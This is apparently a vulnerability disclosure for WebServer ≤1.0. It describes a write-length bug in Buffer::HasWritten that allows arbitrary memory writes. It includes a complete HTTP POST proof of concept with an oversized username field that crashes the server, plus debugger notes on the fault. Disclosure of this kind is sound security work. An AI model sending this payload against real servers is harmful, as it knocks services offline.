BUG_Author: s0l42
Affected Version: WebServer≤ 1.0
Vendor: WebServer GitHub Repository
Software: WebServer
Vulnerability Files:
code/buffer/buffer.cppArbitrary Memory Writting found in code/buffer/buffer.cpp of WebServer≤ 1.0, the method Buffer::HasWritten writes length in a wrong way. For detail, it add the length of user input to writePos_ instead of adding the real written length, user can use this incorrect design to control the address being written next time, which causes an arbitrary memory writing.
To proof the vulnerability, we use the code in httprequest.cpp ,HttpRequest::ParseFromUrlencoded_ receives user inputs and processes them, then it use LOG_DEBUG to write the info to log file, a DoS happends here. For detail, see part Analysis. (Similar with method ParsePost_, sometimes this method causes crash but sometimes the ParseFromUrlencoded_, we found this is related to the length of user input)
The PoC is as follows, which can cause a DoS (accessing an illegal address). The payload username='a'*53820 means we input char a 53820 times, because the page is limited, we use 'a'*53820 to present.
POST /login HTTP/1.1
Host: xxx
Content-Length: 53842
Cache-Control: max-age=0
Origin: xxxx
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: xxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: xxxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
username='a'*53820&password=1
If success, the server will crash and exit. “段错误” means “Segment Fault”
After we analyse the backtrace and debug with gdb, an illegal address access found. The instruction mov word ptr [rdi-2], dx executed when rdx is 0xa, which causes a crash